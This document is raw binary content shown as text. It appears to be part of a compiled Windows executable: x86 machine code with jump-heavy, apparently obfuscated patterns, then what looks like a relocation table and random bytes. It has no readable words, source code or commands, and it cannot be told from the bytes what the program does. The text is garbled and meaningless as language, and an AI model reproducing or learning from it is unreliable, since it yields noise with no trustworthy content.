Y�����$]����K��6�������������H�QhjOE�Y�H�����z�� �m\���E�   �u���E�   �$0  �E�   �=����H8p�hNE��^�����* 7��F  '��N�����+_`�'����K������[�.��C���_�Ç�hh�E �U���hL�meZ���dɁ�>������w����X��hL��X�3�Ł�Dx�t� �з�����<$觳��X-��?@�������d.Z?�Y�W����;��?��J����$�yE �$��H���������S���
�'����AOUX�$�P��E �����U���m��鬜���s  �,�= 7����cL��K�}́��I
�hS���	��������!Y�Zh�;D �r�����/C��跁�����U��R�~��������ʜh<��0�  �zM�����;���������RI?�Á�UPtH��8Ã����h�cE ��p���h��hs^��	�ڌ�q���D[�W�4$�,������D����  �$�$� �p�h7_~�Z�¼~պ�W����4'<��	�G�P����������PV���㳡��û���݁�:p�i���7����ܱ���z���T������&����2h�<$�鮛�����=]��Y������-����b,O�&���ǉ$YSh�	a[��u8��$�ʗ��Y�$��[� Á��i����=�\��KL��N���_ h��D �
��Ł��AV�������������/
�h��<���`'  9�'�_�4$���%  �����b[���O����!����<��������[���xi�����   �������,$�0pB ǆ�       3��  �$Z����U�(�h����X����7/��z��a!�<>���4$�y  ]�N���-~���������(�E���-����������I������/�W�\��h�sZ���������L�QJZ�	P�F��&�kf<��$X�$�������Ç$��^���uPSQ�f�����z"1��$���8`����  ���������S|F�$�����C����+�h�V�OY�����+� @ ���>��$������2   U�A�5`Y�����#� @ ���V
h�eD �;����$X��������k}��������Ȼ�����E �$��2  �����Ł��E7���������������M<@5�$h�I��[��Γgs��|��͇$Qh��@ �/g��������@��I��ōo������dBW �;������:H���Q�����9�������0V�`������l�����h�Е�$�'���5�������\�����IH8�L  ������}� ��?������h$-F^�$�M�Qh=�{7�,��������F��4$��^������Qi�n���$蔮���-џS�؉$Y腶���N�6�W����$�����h��������?��>Х���� �.����mY��/LE��_�������"�����	{� �����!��Y���L����eW�$Ph�ĥ�X���  ���   �$YŁ��,�I�����q����P�����=�Q�Ƥ�M�hj
E ��a���������^���MVϝ�$������+������������#  �!D(�f  ߉$X�E��IA���E��D����E���E����/5����Z(��8|��w���W�$W��?���e�����<A0O����i�OA�a酭��X�8����9���	R�h��.��<$������2  3؉]���2  3E���*��h�Y��P'h߁�8�Y��Vh�s\^����Y��VWN�$��������E �$�X�u�} 镄��V�$��������O����$[UQh،z�
C���ògxf�t"  ��I����W�vO������膴���"�=�����P=���k���23�����K�����E�j�"v��"���Y�u�D"  2��"W�	{��U�wU`���_���ςA=���T�������q���TP����6�Z�����1�P�$��z�����������Kq��������d�0� ������c���y��D�:�"�k��y��2���d���a/�Ap�����������Ƶ�c�^��# �����O�z�\u��FbKX�h���R���E�   h�C �]'���ny��ս����H���H  [�"z��z4��B0����	�ÛV�އ$���E�� �	"���������|-��0��É4$��D �4$������?�➇4$����HeoT�q`��^���(�����U��^�Z������� �[�?���h�|D �*���	!����<$U�z�������~&�!���   $�[_ 
#����]�������������Ǚ�=�<$�����Ⱥa�i��n7P�7 �_��������b��$�%K��y����oT���D���}.�@ ���o�.��$�  �$�*����[ք��Y�v���������=������������|�����h��H�ݐ���=F���u����#\�݁����������nI����:���4$^�U1��U�E��{���Y�E��C1������́�(��os���� �;���G�����²'�2h��Rh���Z�ʅ�p h�E �r���e�f7�C��u���ǖ�ಝ�<$�sh��x[dHṕБ�ǅ������O��p�8w���	b�9 ��g�����NiTp~��Q��3�#���K�Q�����V�  �$Z����v��Kq� �чʋ�����f8�]D���L'���,$��]��������5x���ۜ����v���+����$��<$h�bx��  ��Y
@�$P�h����X��  �ī���D+  �hem9�$�F���@z�����$[�	�h�ٽ�Z��\�ń��������p����%�F��J�������Co��E�V�>���É$Y��J�߇$��;���4$��B��3�yh��D ��6���  �w�T��T�[`��y�p�������#}��6�Y�f���O���$���C �$���f���xq�WPo��D���蠎�������JI���Շ$��YY��	D �$��Y����_����J�ԁ��]�}��)5/�D������U ������#��x���ù${Tй�-  ��v������hf�.��4����4$^蹻��2�� ��o���u������������/������u���s���"M� A ���p��;U��A}�����x����������$Y�D����.K��hd�E �ۘ���	P^h�8E �����`�7|�jA�� x�H\�n�t����S��PA����ET?��Q�BA�����a��4�����&�����U�B������註��V��
���u���nLYw8З�����h�){Y���){� ����;����=����Kd2�?�B���&���o���i+@��:������%�E� Vh�`+�^��C)���t����C[_�r�����n���G  V��  �j�D��^��?�<�Ý��h\�J���E �$��m����o����ۂg�s4��aEy��g�5g�a  hjS�[��}v������<�úo�Ƈ$�s��D�u]H��X��f���J��Y����`�����F?��$�]��K$�˜h��`e�����8@���:mzB����T$�$��?�����7 �����M��E�ShS:�����؇<$_�����T��X�E�����I|�c��RC��<$�Ȭ��+� @ ������B�Ձ�g��u�������@�@�^����X�K<�Lx	��'����)����^n��8v��T������鯷���j����:��������c���b�qZ`��������?��Y|�-�Y�$Y��;X�D � J����3���:����z�����>��H�G;���B�҃#u�#`���}u��3��E�h� E ����Qh�­���E �$��>����z����e��$��_�E��m������"0�h���Y�.��蟊���2G��8<������W�ba a����Y���vz�k����������� Q�
hf5@ �,��h�&E �)����	������h��BX�����&�Rh�c�_�z�����Q{��\��(���!�/́�2�釥����[V��������R�u�J�$�#���0

B0�3������gO���I�����C �E��,�����)�Z����h`���$��X��)3����ӽ>l�����4$^���E��r����?���<$��h1�>�<$�huB Sh@�?A�p�������������4$��E �4$��(  �#c��V����nЮQ[���Z��9Sos\�S��ƈX��Q��RhIB8VZ��М���������ڟ�[�?�<$�u�u�qI�����j��������H���'a��a�ͯE�������������L�Q������#�b���M�h|�A:Z��m� ����������,�i�v�T����$��Y�k���3�"9�ś�$�鈴���c��������a���1���	���胡����R#A�)���$YR�$�S����I{aP���$$  ��t��!��f��Sh���[��� y��}�� �����<$_��zg��hIV@ ��������d^��5`������h���u^��������P��Y��^����h�x����E �������]��~8���
��駉���Ƀ�0��̨������X�U�4$^��P�@���鰇����N��袠���P�~��g�^���c",��y���Z��I�6��Ij��;�������h������ܸ��V�#�    h���Y��( ���@m���@����]_����Wj���^��������������u�4$鳊���'���Ӈ7[p�|������[���t����t�h3�����������$pB ������P����Y��h�"3� @ ��,�:�����3�<$_h�IZ�Y�+���Y7a���Z��5<�d�������T�$�����Vi���?������阮�����:����g���������3��-���&n���>@���m^��j�z��A  7O`M`�贳���P�-Zpe�'  �C���������15��$����<$_	��l����x  �k�������Rh��AZ��g}��P�_����t9M���&X�R����������]��Ȅq �j���Ú-���1����b����^��� ���験�������ف���|f3���f�����ρ�(IBP�����ƨqYY���uq���������V����b�E��q]���.��M���<$��,$��Vh� E �Is����G��������A�������[��E�Qhn��w��D����X�    �J��VY�[��������  ^鄨����	�]��<�P�~Z���$�N��� WOl���C�����*��k����3������K����y]���h�q�X��}��z��`����z�����̫���j���$���~�������\`+[=`W�1��Vh���^���q�y�^� ��2���x���p����p������}����[���vߩ"�e�k�E��5���������f��ݵd�:��<$h��'�h�KD �������k��$b���$�s���$��  p԰ׁ� Ƽ�$Ph������[	�����K����e���T����[��8ZV�U�7������e��U�Z�bk���8+`^�|��Y� @ ��QH�~���}�׊���
��������/�$�-�E �$���y��QhQ�W9�e����P�6��hm?��Y��`t������g�(  ��a�!���������)F	�<$��j���\M�h��9[��+�y���i5���c}��@$�������Iġ^���  ��Q�I�"�����c�������C����$V�hûsp�T��F)1��)�����z���$Y�������Y�T���S��T4�D�i��4�W���,���6�����Z�$��[����h=x�[�����^��$�D���4���v�U�M0���h��:������i���]N�N������,����$YhWstZ靐��������ky�������W������9���h��?EX��
��[��n'��]���t���Ł�h��5� Y]魱��Qh7�Z�Y���	�t�$��L��RShH�i�[���΅��h��� [���!l��BNh���   �P�����x�+��xh������hm���pJ��h�o\�'i��e�xk��9I3��ɮ���?�������d����ܼ?�Ň$X�    �b��������B$�I��    �����E�S�g�������j���饅����  �S����?���������U��E�3��-����g��F;�;E�EW�  D�n�G�C����g����=�N�_��h���Z���Q����"E���Z�������Ӈ��������e���Vh���w�μ���lt����v�`ˁ��c趼���ڝ��#���R�ׇ$h"�`�?���m[�(�����j�Ƕ���<$�Z���� ����\M�hb����g��0p.s���,���p۪=�$�So���E��8�������E�@�B"��hQsD ����h��|�4$��^��7 �m��w���b���n�H:V�4$Vh'y޿�?���d���ZY[XRh�~���r  �Y[�   hF9������3��
 ������E�h�C �����e����?�N�a�"��+���G������l�����?� �������������H��_�t  ���������|����C���Ġ����2��/3x��\��$U�$�Z���Sh$�q�W�����
���锴���ãql�$�������������E�Sh`��$�����d���:;����k�s�Ł�d=s�� PhM�2h�F �����������+���Rh���������J��`#� @ � ����vV����\Z�}�X����+�T���Ɗ��+(���#с�xm�s���KM�<$�I����D��薫��C�e;��,V����"M���1�����Y]�҉$Z��O�����U�-���<$������Z�pB ��U����f��x1����l[@�造����qԦH�  ��d���s�������� �S除����x;�������w�=_�ؿ�������ʏ�#ׇ��vz����@��o��$��;����̉e�V���4$��������X�����ܥ�d�������D�B�7����/d�������z�OP�h�ס�$�d���e��3�����g�~��̉e��c��h[�#[��|��[��v]pG�$XShZn���$��X����$YVh�n���  �w�轝��鄊�Iv&�4$�45��Á�)�����$��M���h	1h�C`G�ڳ@ �����8����������-�3Q���e�����M��1&�R������"_���@Af9���nk��h�}�_�@���d�6=b�$��<$�h/	5Y����Z��� �m��Xս��LԀ��c���4�:h��_��L�t������$�$����������������������G��������������@c���Ң=��Q���Y�$Z�Ƕ�!~�<$�V��������C`4_Pkhk��$������D������U�$��bJ������ˁ�"5��r����E���c���G��w́�k���h�E �XS��zy�7�x�F���Ԏ��Ç<$__������������<$�.����W���Q���h�D �o����	  *���;�	�F���~�9�;P	��	  ��N;��S������;hg.E ��<����R������UP���������������H�$R�`]����`P�1p]Z���n3�魘��3�h�]����B��������*���Ķ��a�lOG�Y��v������T���^������˟��`���)6�F�B���.�K:p�����������'��Ł�&c�0X鶚���$h�h�Y�#����E����:�g���������`͆���gZ3��:ύ�Z�Pd���«�|��Y��7�  dB��p=�~a���4'<Vh�dV�^�y���$�����(pB @��  锳���
���� E��/����B�������=��?I��a  �^́ǬML����L��-��$�0����a���MNXD������Ik�
�X���,���ڣ����`�������(���4$^]ËE������H:�$�d���ٛ	c�,��ƅ���� �f�3�h{'��Y���{6|�[�������������G]���e��́��%{���������K�0�����~�Ӂ�t�C��4$�����������褽������3��u����<$�ǁ���r��z��h����������+��Q���)�$9h��ո�C�������O�`��NP��Xq��^�����x���x< �����h�A&�X����鉷���aI���WI��_���e*I ��+���m��VP����Z���mK�Z`f�Z����C�9�1�ȕ��h������E �_+���[]p\���i0��蟘���L�G�t�2  ��o6˰�Y�7_�������$�$h��X+� @ ��.|�!��+bIR�[�����_�� �J5Q ƃH��E�� hG�E �c���Ç$X��#����Y͢��P���u\���$��=D �s|������NerLR�(�;���*���_?N�����.���$h�iD ���WhVH��_��:�	v��c_;��F��������]���1����.'
́�G�䕍������]��@��:�K�u���<$_��B9d �$�/0����U��#��V$���髣���J����$���h'kD �R����hN���Y�c0���?����(����a=l��%j�����t������<E������3���@���   �)��N����  it�M��� w���   h�I:��C �$�*@��V�Qb��_������D`�ɮ����u����  ���y9@�h��ǹ����	��������/�$Y�M����ZV����M��͡�Z���^u��;�8Z��i�����z(�Q����}�RhL�X�Z��Gi��	s�����*���1���Shg��[��3� @ �@���$YP�h�J�ȸ�fD �Q���������iF��W�R��_�M���B^��Qh��g�� F �$��֧��������_D����L�����\�lh��h_�����<g�����ɈЛ��z���R����_�c�����zt��-�����Y�����0�}AQ�ʇ$�ְ���^�xhw;7������e����X:@��������
�l/��f3���f���.t��h{�D ������"��������$�@t��������[�^�����s��m���w�����V���N`�Ph&V|�X��s�n����������_6��J����Z���p���$�̉e��4$R����h�o݁$�>�"W���<$�����<$_�$輸��j/�cH�p�?����Ͱ��T���w>���]s�����!7�&�����?����Vhɑ��XZ��&:��O����Ve�$81�V��&��?ОZh�E ����X��'����韜��U��"�+H �酋���{����TN����� ��d��I΋ �&��N�n�U����f)M0�=���EPh��C ����h��WN�4$H4���5u��hB�D ����h�������'KzF6`Y��H�T��M� ���4�鄙���M��C���+�P�$�p������e[hKD ������U )����=��������E����|�$餥��h�1�(�(+��芮��)�=s�}C��`Pc�=p�i  �.�%�����q��jxf�J����C�����̑����^�%���J�,�>0_����������|%��v"%K�T��]��軒����td�C����h��D �����h1q|�X���!:��   �~���P������
  �p?����r
  �� E�������+D���%���� :M��4$�B���ltV�D���&�&�;����x��������\��霮����S�����D�ˇ�����Pj j �����)���1����: ���*p������Z�8�I��Qh9G�X���3�&�R��R���W�����������]������f���ص��BȄ7���H���HW#}��iX�  ��QR��Q�4�������iU���HX��R(p�dQ�sW��� ��Ý�4$��A�����h�I��x�D �7p����Y�Q�h1�U�Y����H��$R蒬�����ZM�s��:}���/�����4���������� ���铬����I��������Ⱥa�pB h�����D �$�P����l�����X��p�_Ph.��z�4$.��zR������(��N�:���ߚ^9z�V���t�FpE��������X���Rh�� *Z����Ɓ���$Á�O4p��G4p��<$����l���$X�4$^��O���4$�=���h��R�$���@���Z��Hna�́��*F�֮��蘜��6�϶8P��p����(��8�O������n��r�k�������f�����ƌ|��$������M������L`����������U��&��@��Ϣ L]�A�ճ��ʥH�?���mV��J��`��"��������{{��V\iU�舏��U;]@ y����%v}�4$�o���~��h��&gY�"��^럂h�L��臿�������a��鬋���q����T����<$�����Y��G%\��1�����N^�;��<��]�4$^��?Sw����������:��3����P>;�J+���G?���d��W0~�J�����F �<$��<���ai�?�3�hMD ��������G�IY��;^0?h��E �χ�����|����/��h͵@ �����e��_9���E�8 ��v��������8���{%���\���Ҳ=x?�C�.��Sha�,�$��Y�N���~%���(�K�u���[��w�����a�$�����'���w�+?0
�  ����T������������TV����o���Z�E��Þ�MEp��ۍ���\`i���w���E�� E��E���
E��E���� 2����X�\��$[�4$W���Y���_��������1����$�4$���FV�����uPSQh�#D �,���Q�U��̉e������质��1�������K����˘�O��������l���T�I������Ph'��[���|�����[��?�L���(�$�[���U���̍�tC � ÉE��5����u [�G���h�rX���֌���Y#��s�Ǉ$�^����*�����	�^�M���� ��B4�����S�@i���$��R��(�8S�E�C���!ӹS��ځ���m���P�l\X�忓��Z�,���$�$Rh\V����>���o��������Z����H������8�s��斈Z�C�������Z�V�h{M�,C��@pWP@�ǩ~��[���9����3N��h�\ϰ�<$����4$^��RH���������ui?�8Y�j��}�gZh���Z�ꥥ/��¥��#�Z�������UD8��
����Q��[���J`у�(�B���g�OҞ�Y�aj��o��Y
�	��}��B������T���������UB�*�L���/�*�Q���;��F�^XG���@���4�$RQ�y�����~�����@"B���q����i��B���)���98lB@��r����׈�_0���3�Sh���[��CVX��ʜ���������թ��E���������W轂��?��^��m_���`X@�ǘsx���������y=� @ ��jE4x�<��"� �_脊��Vs�<@�蚮��~����������X����������hu�2^����X����0�Ɋ�6*����������%ԁ�!U##ٹn�C �$���r����3���c����4�������ǍC'��$������T  �����$�$Q�$���PV��{��Qh�=B�Y��]�ā�s�F��":��~��K�É*�;<����d������`���$����5���Ę��h�x'�������Z����	�6��w�����������>�h���ܶ�;��_��I6�4����E��雫��T$��� E��T����
���� �E��E���$��������[%/����������E��O���x���J���]��Mp~�� ��Vh�a��^���`����A��4$����hҎ�-�,$�+���U���]���]�B��*����������+����)���4$e�2�E�P豵���E������Rh�A�f�o��Ü�<$U��V�R����<�\�D  �g�����w���$�W���_j�\|X��K�U���߄h��HLb��謹��k��N�T��O���|����I�����������"���͜���E��]鼜��Why�2_���6x1���i���$�jeP�]B���   �����h]j��Z��}�Z��>��Ⴃ���d`�����-������;�$����=DHG������`�QlM B�YN����o�G�hB�mV�F �>���CzA�o�����鹖����̈́+� @ �s>���&_������p[3%P���X>������h@{��.M����30�����$蘓��������Yz����<$U����z����������©t��=� 	��`����������������<����H���⏹��e��
�7
�U4q��K���$X���z&J� �RhP�c|�������L��/Y�0V�$h�Op'Z�=��L��`:pˋ�X��*�D8�4$�����$�ѷ��~��Ł�5g�� �L~��*,}RA�����0�����������؋���  3؉]�Sh����TY��YY]ËE�x��~���E������h��,2X���P}��f �Ł�E��9����Y�N������pB =�   ���V�h���^轅���4���*g���,���8�I�)b����o���$����J��`�$VY�    Ph?�������Z3�h8��"��5��g��O�_���������c�A���R}����PJ&`�$Ë0�4$^��������e�RSh�φ�[��0�5�À   酒����Q�$�љ�������y����-�h l����������m�����O�V���F��2���9�����\����A����8���H�Ȟ=�P�i��x� �H�>Phx�	X��{�������������M
���u�����������Ww���G�����b����s�����H�8�n��c��Rh��p�4��{�A=��~�sy������N�=`-�n���22���5J���-�U�����w����3����J@��������H�����"���{�����Xd��������h�E �"���$Z�1Y�pB ����������ǆ�       ��0��h��b��������J�����4��+=�t��>p����0�E��T��E��
   �-�����5d���F�FE��!�P�!�����Xp��_�����G�X �������ޥ���h�w|QY����������E�h�"���$��|���*{��H+�`L h0�4Y��hw�鷿���l3���m��I������+��4����n���eh].������5�V��0��.��I���>UZ��D��_�6U���fG��������$V��$�3��U������VY������w���3Ł������,Y�$�����$��[#5� @ ��0[��4$��2��1�^n������������c���`aw����*������������U��R�����HpB ��C�����,���E �z��$��������(9����K@������aD#D ԇ$[����P���3���P�h�aD ��O���H���j)G l��8������W���������\�X�ɗ�D��.���-�����Z�$��[�5����TH������$�hb7��xy���O3ف�K����]��Ǟ����!N��h˚D ��������(��`����+`����IV �鱸����W���<$h�![mZ��(�Ɓ�I|�T�_��������[xuZ� ���C�!�$Sh.g��[����#�hD�`�F1��� �C��.k��́�~~���^����}� ��i������������4$����pB ��7��N�n�����B�\ ��|_�����C��薽����y�A�3�����#�J`�7���Aj�: ��7�����:�1�r7����0�:��蹱��'�ҩI@qf��?����q���7/�|JP:�D7��g���F����@��������ذ�f_�sC�������$X�4$�n����P69��p����	���$R�\@���w���?d8��^��>=���Y�KyP��������_���{A��,���R@G�$����F���X��������}D��鴩��������Q�c<�,�>F���g<0�����[�D�<`7�10����hd-D �F��3���[a́�	D��!^��$ɟ�X���� ~�F���P�����C ��66���I�������(�0q�{W��� ��Y�>`��Q/��B���I�#�Rc��_��        �F �F             UD     |���Yc�+fJ���+Nԛ��Ҋ�f0�CN�IO�Z��}�O�a��[�;       �:�:;�;�;<i<�=r>>�>6?       0X00�0[8�; 0  @   �0�0M1f1�1B2�2�293�3�4�4!5D5Z5t5�6�67B7n7�7�8�9�9�9S:   @     �>�>=?Q?|?�? P     
66L6�;�<�<F=�=�=   �     �;   �     �0@1�185K5�5�7e8k8   �     T0�1�1q34   p P   0�0�1�12�2�34P45@6F6�6�677�7i8o8 9�9�9C:h:+;|;�<�<�=�=2>I>N>m>�>�?�? � l   &0W0k0�1�1�1A2\2�23]3�3�4�4z5�5*6Z67%797`7�7}8�8�8A9�9�9):;:�:�:�:<;�;C<U<<�<�<p=�=�=�>*?8?�?�?   � L   0.1G1�1�34)4d4
5(5Y5�5�5g7�7�7�78�8;�;�<�<;=�=�=�=�>�>�>K?U?�?   � \   N0�0�0!2m2�2�2�2,4u4�4~5}6�6�6#7|7�7�7�7E8P8�8(9�9':�:�:�:�;�;V<�<m=�=�=�=�=?u?�?�? � T   �0�0�011%1_1�1�1�23�4H5�6�6 7H7t7�7U8�8�8�9�9�9�9�9�9�:�;(<�<�<D=�=�=�>�> � l   90~0�0�0�0�0�0B1�1�1A2n2�2�253�3�394�4�4�4	5�5�6�7I8\8s8�8�8�9�9(:e:.;9;�;�;�<=@=�=4>|>/?t?�?�?�?   � P   (1:1�1�1�3�3�4�5�56=6�6,7�7�7�7�7]8m8�8�8
9�9�9�:�;�;�<�<N=�=�=�=�=�?   � L   c0�0�3'4~4�45g5�56n6�6�67*7p7�7g8!9l9�9�95:?:z;�;R<�<@=>�>�>?y? � P   V01B1r1�12&2�2�2L3{3�3�3P4�4a5�5�6�687�7�7�7�7U8�9�9_:�;�;<|<�<">h>]?   \   a0�0�0$1�12B2G2	3;3j3u34e4W5�5�5�6C8z8�8@9�9�9:5:g:�:;�;�;�<�<�<2=|=�=.>V>+?y?�?  \   Z0�0�1�12/2S2e2�23n3<5u5�5�56%6�6�6 7)7k7 8M89Z9�9�9�9�9�9Q:�:�:�:�:<;�<�<�>j?�?   d   50w0�0�0 111�1�1(2�233�3M4�5$6�6�6p7�7�7�8�8�89�9�9�:;h; <<�<�<=�=!>:>p>�>�>?0?n?   0 P   �0s1�1�12�23!3&3�3�3q4 5�5.6�6�7%8i8�8�8)9�9�:K;�;L<�<�<	=2=�>q?�?�?   @ \   �0�0�0O1�1�1�2�2q3�3�3�34y4�4Y5�5�5/696w6|6717�7�89'9�9�9:M:�:;A;�;�;�=g>�>�>�? P L   S0�0^1142>2h2�2-3^3o34?4�5�6r7�89X9�9^:�:�;<<N<Y<�<U=T>?!?i?�? ` \   O0O1�1�1 2H2�2]3j4H5W5�5�56G6�6�6+7W8�8�8�8$9�9�9�9:2;0<<�<�<�<�<
=D=c=�={>�>+?�? p X   Q0�0�01�13�3�3q4�4�4�5�5?67�7�7�78@89%9�9":~:�:;{;)<�<�<=N={=�=�=�=l>�>�? � h   �031u1�1�172e23%4_4|4�4�455F5d5�5�566�6�68$888K8%939�9�9:8:7;�;�;�;�<�<y==�=�=5>�>Z?o?�?   � `   0C0�0112e2F3\3w3�3�3i5q66�6�6%7G7�7�7�89F9Y9_:�:�;�;�;<7<E<�<!=�=�=>d>�>6?o?�?   � X   <0�01�1�102�2.3G4�455@6�67m77)8�8�8�8�95:�:�:�:k;�;�;�<=G=R=->g>�>�>?*?   � h   !0G0l0�0�0�0�1�1�2�2x3�3`4�4�4�45�5�5�5�56`6�6�657J7X7z78�89D9�9�9:$:B:�:�:�:O<T<l<B=i=^?�? � P   H0�0�01�1�1�1�2;3�3[4�5�576Z6�6/7�788�8�8f:�:�:;�;�;�; <J<a<�<�=@>�?   � P   $080l021�1C2t2�3N4�45�5�57�7�78�8�9q:�:q;�;<k<z=�=�=>9>�>?�?�?�?   � \   0�0�0�1X2�2�2�3�3�4o5�5�5N6c7r7�7�7�8�8$9�9�9:L:�:6;�;O<�<=2=s=�=�=">.>�>�>�>R?   � 4   �0�0�0M1k1�1�1/2p2�2�23�<�<H=�=�=p>�>�>K?Y?   D   	00�0&122`3f3Z4m45F5�5-7378R8%9x9�:�;<�<k=>�>�>?W?y?  \   	0�0<1�1y2'3k3�3�3�3M45�5�6�7�7�7�7�8&9N9Y9_9�9=:q:?;R;l;�;�;�<�<�<=~>�>�>�>�>�?     \   0�01I1�1�1�2�23K3�35T56'6h6r6�6�6B7~7�78:89*:j:�:5;�;<<Y<k<�<�<�=�=>s>�>x?   0 \   s0�0t1~1�1�1U3�3�3;4i5�5y6�6�6U78d8�8�8�8g9�9�:�:9;b;�;�;<7<G<�<	==R=�=&>�>1?�?�? @ H   L0V0�0&2'3f3�3�3�3R4a5u5'6i8~8�8�8&9R9�9O:c::�:;�;�<[=�=?-?   P `   1.1X1�1�1�1#2C2x2�2�2�3�3�3&4T4�4F5x5�5�5W6o67q7�7o8�8�8�9K:^;m;�;�;U=u=�=�=�>�>?�?   ` @   1R1 34�45�5�5�5�6�647g7/8�8_95:?:�:_;�;0<=s=�=!>X>/? p X   �041;1�1%2�2�2+3B3^3�3�4�4�45,5n56=6a6�6�7�8�9�9b:�:�:�;�;�<�<]=y=V>�>?�?�?�? � D   0�0+1m1#2�2�2�23;3g3�3�78`8{829R:�:�;�;a<�<�=a>m>�>�>-?:? � l   0�0�1�1�1�1�1�23\3]4�4�4N5666i6y6�6�6�67V7i7�7�7�7�7J8�889�9C:�:;M;�;	<6<D<�<S=	>m>�>�>�>k?�?   � L   &0�12q3�3�34�4�4�4�6�7�7�8�8&:D:�:;?;�;D<W<�<�<=�=>t> ?V?�?�?   � H   80M0<1�1q2�2�2>3�45`5o5�5�5d6�6x7�7�7�7_8@9Z9G;6<�<�=�>�>�>l?�? � P   �0|1�1�1*2<2\2�2#3P3�3�3;4�45�5�5�5�6�7�7�8�9�9:C:�:0;�;<5<�<v>�>�?   � `   0�0�0�0�1)2e2r3�3�3+4~4N5s6�6�6l7�7-8H8g8�8�9�9�:;(;2;�;�;�;�<�<�<i=7>U>x>~>�>�>�>?   � d   �0�0�1�1�2
393d3r3�3�3G4	5"5U6n6�6�6�7�7�8�8�8 9T9�9�9?:}:�:�:;;�;�; <0<W=�=�=\>�>�>�>c?�? � d   D0�0z1�1�1�1�1 2f2�2'3�3-4%5S5~5�56?6�6�67T7�7�78�8�8l9�9A:�:�:�;�<�<�=>E>k>�>�>�>,?�?     X   S0h0�0J1N2�2�2363�3,5�5�5606�67x7�7�7�7�7�7�7\89v9�9�:�;�;7<V<�=>?&?^?�?    ,   0�0�2�2�3	44Q4c4�4(5�5-7d7�7�7�7                  Rܴ[���m9��D��x�7�U3�����w/�>Ϡ�,C��ЋW���Ma�7)	�޾K6�nȳ�]3*m-�j����s�h��Ь��-�S<6a�ĸ�=n`q����	��[��O��h�����D'?���ddA#��}W�Ҿ'O�p�Q&(�Q�zkhb�	r0�